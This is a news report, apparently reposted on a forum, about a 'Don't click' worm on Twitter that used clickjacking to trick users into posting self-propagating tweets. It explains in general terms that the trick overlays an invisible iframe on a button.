Twitter attack exposes awesome power of clickjacking

Do you have a question? Post it now! No Registration Necessary.  Now with pictures!


A worm that forced a wave of people to unintentionally broadcast messages on
microblogging site Twitter shows the potential of a vulnerability known as
clickjacking to dupe large numbers of internet users into installing malware
or visiting malicious pages without any clue they're being attacked.

The outbreak was touched off by tweets that led Twitter readers to a button
labeled "Don't click." Gullible users (including your reporter) who clicked
on the button automatically posted messages that posted yet more tweets
advertising the link. The attacks persisted even after Twitter added
countermeasures to its site and proclaimed the issued fixed.

The attack exploited a vulnerability at the core of the web that allows
webmasters to trick users into clicking on one link even though the
underlying HTML code appears to show it leads elsewhere. The so-called
clickjacking exploit is pulled off by superimposing an invisible iframe over
a button or link. Virtually every website and browser is susceptible to the
technique. Technical details are available here. /

Site Timeline